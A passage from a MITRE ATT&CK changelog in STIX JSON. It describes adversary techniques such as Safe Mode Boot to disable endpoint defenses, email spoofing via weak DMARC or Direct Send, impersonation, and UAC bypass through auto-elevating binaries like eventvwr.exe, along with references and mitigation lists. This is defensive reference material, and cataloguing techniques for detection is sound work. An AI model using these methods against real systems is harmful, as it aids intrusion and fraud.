                        "Menachem Goldstein"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "PRE"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--c7660f19-f8c5-4ae3-a5e5-24381c270376",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-14 22:53:27.979000+00:00",
                    "modified": "2026-04-22 15:48:52.409000+00:00",
                    "name": "Safe Mode Boot",
                    "description": "Adversaries may abuse Windows safe mode to disable endpoint defenses. Safe mode starts up the Windows operating system with a limited set of drivers and services. Third-party security software such as endpoint detection and response (EDR) tools may not start after booting Windows in safe mode. There are two versions of safe mode: Safe Mode and Safe Mode with Networking. It is possible to start additional services after a safe mode boot.(Citation: Microsoft Windows Startup Settings)(Citation: Sophos Safe Mode Boot)\n\nAdversaries may abuse safe mode to disable endpoint defenses that may not start with a limited boot. Hosts can be forced into safe mode after the next reboot via modifications to Boot Configuration Data (BCD) stores, which are files that manage boot application settings.(Citation: Microsoft bcdedit)\n\nAdversaries may also add their malicious applications to the list of minimal services that start in safe mode by modifying relevant Registry values (i.e. [Modify Registry](https://attack.mitre.org/techniques/T1112)). Malicious [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) objects may also be registered and loaded in safe mode.(Citation: CyberArk Labs Safe Mode 2016)(Citation: Cybereason safe mode boot)(Citation: BleepingComputer REvil 2021)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "defense-impairment"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1688",
                            "external_id": "T1688"
                        },
                        {
                            "source_name": "BleepingComputer REvil 2021",
                            "description": "Abrams, L. (2021, March 19). REvil ransomware has a new \u2018Windows Safe Mode\u2019 encryption mode. Retrieved June 23, 2021.",
                            "url": "https://www.bleepingcomputer.com/news/security/revil-ransomware-has-a-new-windows-safe-mode-encryption-mode/"
                        },
                        {
                            "source_name": "Sophos Safe Mode Boot",
                            "description": "Andrew Brandt. (2019, December 9). Snatch ransomware reboots PCs into Safe Mode to bypass protection. Retrieved April 15, 2026.",
                            "url": "https://www.sophos.com/en-us/blog/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection"
                        },
                        {
                            "source_name": "Cybereason safe mode boot",
                            "description": "Cybereason Nocturnus. (n.d.). Cybereason vs. MedusaLocker Ransomware. Retrieved April 15, 2026.",
                            "url": "https://www.cybereason.com/blog/research/medusalocker-ransomware"
                        },
                        {
                            "source_name": "Microsoft Windows Startup Settings",
                            "description": "Microsoft. (n.d.). Retrieved April 15, 2026.",
                            "url": "https://support.microsoft.com/en-us/windows/windows-startup-settings-1af6ec8c-4d4a-4b23-adb7-e76eef0b847f"
                        },
                        {
                            "source_name": "Microsoft bcdedit",
                            "description": "Microsoft. (n.d.). Retrieved April 15, 2026.",
                            "url": "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/bcdedit"
                        },
                        {
                            "source_name": "CyberArk Labs Safe Mode 2016",
                            "description": "Naim, D.. (2016, September 15). CyberArk Labs: From Safe Mode to Domain Compromise. Retrieved June 23, 2021.",
                            "url": "https://www.cyberark.com/resources/blog/cyberark-labs-from-safe-mode-to-domain-compromise"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Jorell Magtibay, National Australia Bank Limited",
                        "Kiyohito Yamamoto, RedLark, NTT Communications",
                        "Yusuke Kubo, RedLark, NTT Communications"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--41e4d77a-6275-4976-9e35-785985598519",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-14 22:53:26.607000+00:00",
                    "modified": "2026-04-15 15:39:55.218000+00:00",
                    "name": "Social Engineering",
                    "description": "Adversaries may use social engineering techniques to influence users to take actions that result in unauthorized access, approval of changes, disclosure of sensitive information, or execution of adversary-supplied instructions (i.e., introduction of malicious payloads or software), while minimizing technical indicators. \n\nAdversaries may leverage trust-building methods across multiple channels (e.g., executive, vendor, or help desk scenarios, including AI-enabled voice interactions) to prompt user-authorized actions such as password resets, MFA changes, financial approvals, or the disclosure of sensitive information. Adversaries may also leverage common business communications and workflows such as email, collaboration platforms, voice communications, recruiting processes, help desk interactions, and SaaS consent mechanisms to make malicious requests appear routine and legitimate.(Citation: Proofpoint TA427 April 2024)(Citation: SE SentinelOne 2)(Citation: SE - Hackers Target Workday)\n\nAdditionally, adversaries have persuaded victims to take actions through references of current events, harnessing relevant themes to the work role or the organizations mission. For example, adversaries may use scare tactics (i.e., threaten repercussions for non-compliance) or otherwise incite victims\u2019 emotions in order to generate a sense of urgency to take action.(Citation: SE Proofpoint)(Citation: SE SentinelOne)\n\nThis technique may include common social engineering patterns such as [Phishing](https://attack.mitre.org/techniques/T1566) and [Spearphishing Voice](https://attack.mitre.org/techniques/T1566/004), often supported by convincing and targeted narratives.(Citation: SE SentinelOne 2)(Citation: Fortinet Trends 25-26)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1684",
                            "external_id": "T1684"
                        },
                        {
                            "source_name": "SE - Hackers Target Workday",
                            "description": "David Jones. (2025, August 19). Hackers target Workday in social engineering attack. Retrieved April 15, 2026.",
                            "url": "https://www.cybersecuritydive.com/news/hackers-target-workday-in-social-engineering-attack/758095/#:~:text=Researchers%20cite%20increasing%20evidence%20of,told%20Cybersecurity%20Dive%20via%20email."
                        },
                        {
                            "source_name": "Fortinet Trends 25-26",
                            "description": "Fortinet. (n.d.). Recent Cyber Attacks & Emerging Cybersecurity Trends. Retrieved April 15, 2026.",
                            "url": "https://www.fortinet.com/uk/resources/cyberglossary/recent-cyber-attacks"
                        },
                        {
                            "source_name": "Proofpoint TA427 April 2024",
                            "description": "Lesnewich, G. et al. (2024, April 16). From Social Engineering to DMARC Abuse: TA427\u2019s Art of Information Gathering. Retrieved May 3, 2024.",
                            "url": "https://www.proofpoint.com/us/blog/threat-insight/social-engineering-dmarc-abuse-ta427s-art-information-gathering"
                        },
                        {
                            "source_name": "SE Proofpoint",
                            "description": "Proofpoint. (n.d.). What Is Social Engineering?. Retrieved April 15, 2026.",
                            "url": "https://www.proofpoint.com/us/threat-reference/social-engineering"
                        },
                        {
                            "source_name": "SE SentinelOne",
                            "description": "SentinelOne. (2023, October 19). Social Engineering Attacks | How to Recognize and Resist The Bait. Retrieved April 15, 2026.",
                            "url": "https://www.sentinelone.com/blog/social-engineering-attacks-how-to-recognize-and-resist-the-bait/"
                        },
                        {
                            "source_name": "SE SentinelOne 2",
                            "description": "SentinelOne. (2025, August 19). 15 Types of Social Engineering Attacks. Retrieved April 15, 2026.",
                            "url": "https://www.sentinelone.com/cybersecurity-101/threat-intelligence/types-of-social-engineering-attacks/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "macOS",
                        "Office Suite",
                        "SaaS",
                        "Windows"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--fcf5bccf-be7a-48ff-b7a7-8d6019279301",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-14 22:54:01.539000+00:00",
                    "modified": "2026-04-22 15:49:23.425000+00:00",
                    "name": "Email Spoofing",
                    "description": "Adversaries may fake, or spoof, a sender\u2019s identity by modifying the value of relevant email headers in order to establish contact with victims under false pretenses.(Citation: Proofpoint TA427 April 2024)\u00a0In addition to actual email content, email headers (such as the FROM header, which contains the email address of the sender) may also be modified. Email clients display these headers when emails appear in a victim's inbox, which may cause modified emails to appear as if they were from the spoofed entity.\n\nEnterprise environments can use Domain-based Message Authentication, Reporting, and Conformance (DMARC) as an email authentication protocol that references results of the Sender Policy Framework (SPF) and DomainKeys Identified Mail (DKIM) configurations. SPF and DKIM are configured separately in DNS: SPF verifies that the sending server is authorized for the domain, while DKIM uses a digital signature to verify email integrity and domain authentication. Together, they validate email authenticity and specify how receiving servers should handle authentication failures. Without enforced identity authentication, adversaries may compromise the integrity of an authentication check with altered headers that would not have otherwise passed.(Citation: Cloudflare DMARC, DKIM, and SPF)(Citation: DMARC-overview)(Citation: Proofpoint-DMARC)\n\nAn example of a weak or absent DMARC policy is `v=DMARC1; p=none; fo=1;`. The `p=none`. The `p=none` indicates no action should be taken, and therefore no filtering action will take place, even if an email fails authentication checks (i.e., SPF and/or DKIM fail). When a DMARC policy indicates no action, the email will still be delivered to the victim\u2019s inbox.(Citation: ic3-dprk) \n\nAdversaries have abused weak or absent DMARC policies to circumvent authentication checks and conceal social engineering attempts. Adversaries can alter email headers to include legitimate domain names with fake usernames or impersonate legitimate users via [Impersonation](https://attack.mitre.org/techniques/T1684/001) for [Phishing](https://attack.mitre.org/techniques/T1566). Additionally, adversaries may abuse Microsoft 365\u2019s Direct Send functionality to spoof internal users by using internal devices like printers to send emails without authentication.(Citation: Barnea DirectSend)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1684/002",
                            "external_id": "T1684.002"
                        },
                        {
                            "source_name": "Cloudflare DMARC, DKIM, and SPF",
                            "description": "Cloudflare. (n.d.). What are DMARC, DKIM, and SPF?. Retrieved April 8, 2025.",
                            "url": "https://www.cloudflare.com/learning/email-security/dmarc-dkim-spf/"
                        },
                        {
                            "source_name": "DMARC-overview",
                            "description": "DMARC. (n.d.). Retrieved March 24, 2025.",
                            "url": "https://dmarc.org/overview"
                        },
                        {
                            "source_name": "ic3-dprk",
                            "description": "FBI, State Department, NSA. (2024, May 2). North Korean Actors Exploit Weak DMARC Security Policies to Mask Spearphishing Efforts. Retrieved April 2, 2025.",
                            "url": "https://www.ic3.gov/CSA/2024/240502.pdf"
                        },
                        {
                            "source_name": "Proofpoint TA427 April 2024",
                            "description": "Lesnewich, G. et al. (2024, April 16). From Social Engineering to DMARC Abuse: TA427\u2019s Art of Information Gathering. Retrieved May 3, 2024.",
                            "url": "https://www.proofpoint.com/us/blog/threat-insight/social-engineering-dmarc-abuse-ta427s-art-information-gathering"
                        },
                        {
                            "source_name": "Proofpoint-DMARC",
                            "description": "Proofpoint. (n.d.). Retrieved March 24, 2025.",
                            "url": "https://www.proofpoint.com/us/threat-reference/dmarc"
                        },
                        {
                            "source_name": "Barnea DirectSend",
                            "description": "Tom Barnea. (2025, September 9). Ongoing Campaign Abuses Microsoft 365\u2019s Direct Send to Deliver Phishing Emails. Retrieved September 24, 2025.",
                            "url": "https://www.varonis.com/blog/direct-send-exploit"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "macOS",
                        "Office Suite",
                        "Windows"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--cd92d2b8-ce43-4666-9472-f1b4b9f4f8be",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-14 22:54:01.082000+00:00",
                    "modified": "2026-04-22 15:50:04.400000+00:00",
                    "name": "Impersonation",
                    "description": "Adversaries may impersonate a trusted person or organization in order to persuade and trick a target into performing some action on their behalf. For example, adversaries may communicate with victims (via [Phishing for Information](https://attack.mitre.org/techniques/T1598), [Phishing](https://attack.mitre.org/techniques/T1566), or [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)) while impersonating a known sender such as an executive, colleague, or third-party vendor. Established trust can then be leveraged to accomplish an adversary\u2019s ultimate goals, possibly against multiple victims.\n\nIn many cases of business email compromise or email fraud campaigns, adversaries use impersonation to defraud victims -- deceiving them into sending money or divulging information that ultimately enables [Financial Theft](https://attack.mitre.org/techniques/T1657).\n\nAdversaries will often also use social engineering techniques such as manipulative and persuasive language in email subject lines and body text such as `payment`, `request`, or `urgent` to push the victim to act quickly before malicious activity is detected. These campaigns are often specifically targeted against people who, due to job roles and/or accesses, can carry out the adversary\u2019s goal.\u202f\u202f\n\nImpersonation is typically preceded by reconnaissance techniques such as [Gather Victim Identity Information](https://attack.mitre.org/techniques/T1589) and [Gather Victim Org Information](https://attack.mitre.org/techniques/T1591) as well as acquiring infrastructure such as email domains (i.e. [Domains](https://attack.mitre.org/techniques/T1583/001)) to substantiate their false identity.(Citation: Crowdstrike BEC)\n\nThere is the potential for multiple victims in campaigns involving impersonation. For example, an adversary may Compromise Accounts targeting one organization which can then be used to support impersonation against other entities.(Citation: VEC)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1684/001",
                            "external_id": "T1684.001"
                        },
                        {
                            "source_name": "Crowdstrike BEC",
                            "description": "Bart Lenaerts-Bergmans. (2023, August 8). What is Business Email Compromise?. Retrieved April 15, 2026.",
                            "url": "https://www.crowdstrike.com/en-us/cybersecurity-101/threat-intelligence/business-email-compromise-bec/"
                        },
                        {
                            "source_name": "VEC",
                            "description": "CloudFlare. (n.d.). What is vendor email compromise (VEC)?. Retrieved September 12, 2023.",
                            "url": "https://www.cloudflare.com/learning/email-security/what-is-vendor-email-compromise/#:~:text=Vendor%20email%20compromise%2C%20also%20referred,steal%20from%20that%20vendor%27s%20customers."
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Blake Strom, Microsoft Threat Intelligence",
                        "Pawel Partyka, Microsoft Threat Intelligence"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "macOS",
                        "Office Suite",
                        "SaaS",
                        "Windows"
                    ],
                    "x_mitre_version": "1.0"
                }
            ],
            "major_version_changes": [
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--67720091-eee3-4d2d-ae16-8264567f6f5b",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-01-30 13:58:14.373000+00:00",
                    "modified": "2026-04-21 18:05:00.504000+00:00",
                    "name": "Abuse Elevation Control Mechanism",
                    "description": "Adversaries may circumvent mechanisms designed to control privilege elevation to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk.(Citation: TechNet How UAC Works)(Citation: sudo man page 2018) An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.(Citation: OSX Keydnap malware)(Citation: Fortinet Fareit)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "privilege-escalation"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1548",
                            "external_id": "T1548"
                        },
                        {
                            "source_name": "TechNet How UAC Works",
                            "description": "Lich, B. (2016, May 31). How User Account Control Works. Retrieved June 3, 2016.",
                            "url": "https://technet.microsoft.com/en-us/itpro/windows/keep-secure/how-user-account-control-works"
                        },
                        {
                            "source_name": "OSX Keydnap malware",
                            "description": "Marc-Etienne M.Leveille. (2016, July 6). New OSX/Keydnap malware is hungry for credentials. Retrieved July 3, 2017.",
                            "url": "https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/"
                        },
                        {
                            "source_name": "Fortinet Fareit",
                            "description": "Salvio, J., Joven, R. (2016, December 16). Malicious Macro Bypasses UAC to Elevate Privilege for Fareit Malware. Retrieved December 27, 2016.",
                            "url": "https://blog.fortinet.com/2016/12/16/malicious-macro-bypasses-uac-to-elevate-privilege-for-fareit-malware"
                        },
                        {
                            "source_name": "sudo man page 2018",
                            "description": "Todd C. Miller. (2018). Sudo Man Page. Retrieved March 19, 2018.",
                            "url": "https://www.sudo.ws/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "macOS",
                        "Windows",
                        "IaaS",
                        "Office Suite",
                        "Identity Provider"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-21 18:05:00.504000+00:00\", \"old_value\": \"2025-10-24 17:48:53.277000+00:00\"}, \"root['description']\": {\"new_value\": \"Adversaries may circumvent mechanisms designed to control privilege elevation to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk.(Citation: TechNet How UAC Works)(Citation: sudo man page 2018) An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.(Citation: OSX Keydnap malware)(Citation: Fortinet Fareit)\", \"old_value\": \"Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk.(Citation: TechNet How UAC Works)(Citation: sudo man page 2018) An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.(Citation: OSX Keydnap malware)(Citation: Fortinet Fareit)\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.5\"}}, \"iterable_item_removed\": {\"root['kill_chain_phases'][1]\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"defense-evasion\"}}}",
                    "previous_version": "1.5",
                    "version_change": "1.5 \u2192 2.0",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to31__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to31__0\"><a href=\"#difflib_chg_to31__top\">t</a></td><td class=\"diff_header\" id=\"from31_1\">1</td><td nowrap=\"nowrap\">Adversaries&nbsp;may&nbsp;circumvent&nbsp;mechanisms&nbsp;designed&nbsp;to&nbsp;control&nbsp;<span class=\"diff_chg\">el</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to31__top\">t</a></td><td class=\"diff_header\" id=\"to31_1\">1</td><td nowrap=\"nowrap\">Adversaries&nbsp;may&nbsp;circumvent&nbsp;mechanisms&nbsp;designed&nbsp;to&nbsp;control&nbsp;<span class=\"diff_chg\">pr</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_chg\">evate&nbsp;privileges&nbsp;to&nbsp;gain</span>&nbsp;higher-level&nbsp;permissions.&nbsp;Most&nbsp;mode</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_chg\">ivilege&nbsp;elevation&nbsp;to&nbsp;gain</span>&nbsp;higher-level&nbsp;permissions.&nbsp;Most&nbsp;mod</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">rn&nbsp;systems&nbsp;contain&nbsp;native&nbsp;elevation&nbsp;control&nbsp;mechanisms&nbsp;that&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ern&nbsp;systems&nbsp;contain&nbsp;native&nbsp;elevation&nbsp;control&nbsp;mechanisms&nbsp;that</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">are&nbsp;intended&nbsp;to&nbsp;limit&nbsp;privileges&nbsp;that&nbsp;a&nbsp;user&nbsp;can&nbsp;perform&nbsp;on&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;are&nbsp;intended&nbsp;to&nbsp;limit&nbsp;privileges&nbsp;that&nbsp;a&nbsp;user&nbsp;can&nbsp;perform&nbsp;on</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">a&nbsp;machine.&nbsp;Authorization&nbsp;has&nbsp;to&nbsp;be&nbsp;granted&nbsp;to&nbsp;specific&nbsp;users</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;a&nbsp;machine.&nbsp;Authorization&nbsp;has&nbsp;to&nbsp;be&nbsp;granted&nbsp;to&nbsp;specific&nbsp;user</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;in&nbsp;order&nbsp;to&nbsp;perform&nbsp;tasks&nbsp;that&nbsp;can&nbsp;be&nbsp;considered&nbsp;of&nbsp;higher&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">s&nbsp;in&nbsp;order&nbsp;to&nbsp;perform&nbsp;tasks&nbsp;that&nbsp;can&nbsp;be&nbsp;considered&nbsp;of&nbsp;higher</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">risk.(Citation:&nbsp;TechNet&nbsp;How&nbsp;UAC&nbsp;Works)(Citation:&nbsp;sudo&nbsp;man&nbsp;pa</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;risk.(Citation:&nbsp;TechNet&nbsp;How&nbsp;UAC&nbsp;Works)(Citation:&nbsp;sudo&nbsp;man&nbsp;p</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ge&nbsp;2018)&nbsp;An&nbsp;adversary&nbsp;can&nbsp;perform&nbsp;several&nbsp;methods&nbsp;to&nbsp;take&nbsp;ad</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">age&nbsp;2018)&nbsp;An&nbsp;adversary&nbsp;can&nbsp;perform&nbsp;several&nbsp;methods&nbsp;to&nbsp;take&nbsp;a</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">vantage&nbsp;of&nbsp;built-in&nbsp;control&nbsp;mechanisms&nbsp;in&nbsp;order&nbsp;to&nbsp;escalate&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">dvantage&nbsp;of&nbsp;built-in&nbsp;control&nbsp;mechanisms&nbsp;in&nbsp;order&nbsp;to&nbsp;escalate</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">privileges&nbsp;on&nbsp;a&nbsp;system.(Citation:&nbsp;OSX&nbsp;Keydnap&nbsp;malware)(Citat</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;privileges&nbsp;on&nbsp;a&nbsp;system.(Citation:&nbsp;OSX&nbsp;Keydnap&nbsp;malware)(Cita</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ion:&nbsp;Fortinet&nbsp;Fareit)</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tion:&nbsp;Fortinet&nbsp;Fareit)</td></tr>\n        </tbody>\n    </table>",
                    "changelog_mitigations": {
                        "shared": [
                            "M1018: User Account Management",
                            "M1022: Restrict File and Directory Permissions",
                            "M1026: Privileged Account Management",
                            "M1028: Operating System Configuration",
                            "M1038: Execution Prevention",
                            "M1047: Audit",
                            "M1051: Update Software",
                            "M1052: User Account Control"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0345: Detection Strategy for Abuse Elevation Control Mechanism (T1548)"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--120d5519-3098-4e1c-9191-2aa61232f073",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-01-30 14:24:34.977000+00:00",
                    "modified": "2026-04-15 19:51:31.419000+00:00",
                    "name": "Bypass User Account Control",
                    "description": "Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.(Citation: TechNet How UAC Works)\n\nIf the UAC protection level of a computer is set to anything but the highest level, certain Windows programs can elevate privileges or execute some elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) objects without prompting the user through the UAC notification box.(Citation: TechNet Inside UAC)(Citation: MSDN COM Elevation) An example of this is use of [Rundll32](https://attack.mitre.org/techniques/T1218/011) to load a specifically crafted DLL which loads an auto-elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.(Citation: Davidson Windows)\n\nMany methods have been discovered to bypass UAC. The Github readme page for UACME contains an extensive list of methods(Citation: Github UACMe) that have been discovered and implemented, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as:\n\n* <code>eventvwr.exe</code> can auto-elevate and execute a specified binary or script.(Citation: enigma0x3 Fileless UAC Bypass)(Citation: Fortinet Fareit)\n\nAnother bypass is possible through some lateral movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on remote systems and default to high integrity.(Citation: SANS UAC Bypass)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "privilege-escalation"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1548/002",
                            "external_id": "T1548.002"
                        },
                        {
                            "source_name": "Davidson Windows",
                            "description": "Davidson, L. (n.d.). Windows 7 UAC whitelist. Retrieved November 12, 2014.",
                            "url": "http://www.pretentiousname.com/misc/win7_uac_whitelist2.html"
                        },
                        {
                            "source_name": "TechNet How UAC Works",
                            "description": "Lich, B. (2016, May 31). How User Account Control Works. Retrieved June 3, 2016.",
                            "url": "https://technet.microsoft.com/en-us/itpro/windows/keep-secure/how-user-account-control-works"
                        },
                        {
                            "source_name": "SANS UAC Bypass",
                            "description": "Medin, T. (2013, August 8). PsExec UAC Bypass. Retrieved June 3, 2016.",
                            "url": "http://pen-testing.sans.org/blog/pen-testing/2013/08/08/psexec-uac-bypass"
                        },
                        {
                            "source_name": "MSDN COM Elevation",
                            "description": "Microsoft. (n.d.). The COM Elevation Moniker. Retrieved July 26, 2016.",
